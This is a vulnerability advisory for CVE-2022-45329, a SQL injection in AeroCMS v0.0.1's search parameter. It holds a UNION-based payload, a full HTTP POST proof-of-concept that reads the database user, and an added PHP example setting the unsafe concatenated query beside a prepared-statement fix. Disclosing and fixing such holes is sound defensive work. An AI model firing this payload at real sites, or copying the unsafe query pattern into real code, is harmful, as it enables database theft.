# CVE-2022-45329 (rdyx0/CVE: search_sql_injection.md)
AeroCMS v0.0.1 was discovered to contain a SQL Injection vulnerability via the Search parameter. This vulnerability allows attackers to access database information.
## Steps to Reproduce

- The `search` parameter of the AeroCMS-v0.0.1 CMS is vulnerable to SQL injection. A malicious user can dump (steal) the database from this CMS and use it for further malicious purposes.
## Exploit

Query the current database user (`user()`).
## Vulnerable Code

The `search` parameter is submitted via POST and passed straight into the `mysql_query()` function without any filtering or escaping.

Resulting SQL statement:

```sql
SELECT * FROM posts WHERE post_tags LIKE '%a%' union select 1,2,user(),4,5,6,7,8,9,10,11,12-- q%'
```
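Added example (not AeroCMS's own code) of the unsafe pattern the advisory describes next to a hardened replacement: the legacy `mysql_*` extension offers no parameter binding (and was removed in PHP 7), so the fix moves the query to mysqli prepared statements and escapes the LIKE wildcards; the table and column names and the connection credentials are assumed.

```php
<?php
// Added example, not AeroCMS code. Assumes a `posts` table with `post_tags` and
// `post_title` columns and a mysqli connection; credentials are placeholders.

// Unsafe pattern, as the advisory describes it: the raw POST value is spliced
// into the SQL text, so a quote in it ends the LIKE literal and everything after
// it is parsed as SQL (UNION SELECT, comment markers, ...).
function search_posts_unsafe(mysqli $db, string $term): array
{
    $sql = "SELECT * FROM posts WHERE post_tags LIKE '%" . $term . "%'";
    $result = $db->query($sql);
    return $result ? $result->fetch_all(MYSQLI_ASSOC) : [];
}

// Hardened version: the SQL text is constant and the term travels as a bound
// parameter, so it is always data and never part of the statement. The LIKE
// wildcards % and _ (and the backslash escape character) are escaped as well,
// so a user can only search for their literal text, not widen the match.
function search_posts_safe(mysqli $db, string $term): array
{
    $pattern = '%' . addcslashes($term, '%_\\') . '%';
    $stmt = $db->prepare('SELECT * FROM posts WHERE post_tags LIKE ?');
    $stmt->bind_param('s', $pattern);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC); // get_result() needs mysqlnd
    $stmt->close();
    return $rows;
}

// search.php request handling: only the hardened path is reachable.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // throw instead of failing silently
$db = new mysqli('localhost', 'aerocms_user', 'placeholder-password', 'aerocms'); // assumed
$db->set_charset('utf8mb4');

$term = isset($_POST['search']) ? trim((string) $_POST['search']) : '';
if ($term === '' || strlen($term) > 100) { // assumed length limit for search terms
    $posts = [];
} else {
    $posts = search_posts_safe($db, $term);
}
foreach ($posts as $post) {
    // Escape on output too, so stored post content cannot inject HTML into the page.
    echo htmlspecialchars($post['post_title'] ?? '', ENT_QUOTES, 'UTF-8'), "\n";
}
```

Because the term is bound rather than concatenated, the advisory's payload is matched literally as tag text and `user()` is never evaluated.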
## PoC

Injection point:

```
search=a%' union select 1,2,user(),4,5,6,7,8,9,10,11,12-- q
```

Request:

```http
POST /AeroCMS-0.0.1/search.php HTTP/1.1
Host: localhost
Content-Length: 31
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/AeroCMS-0.0.1/post.php?p_id=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ffopa5dean7sk0fe55kc93e163
Connection: close

search=a%' union select 1,2,user(),4,5,6,7,8,9,10,11,12-- q&submit=
```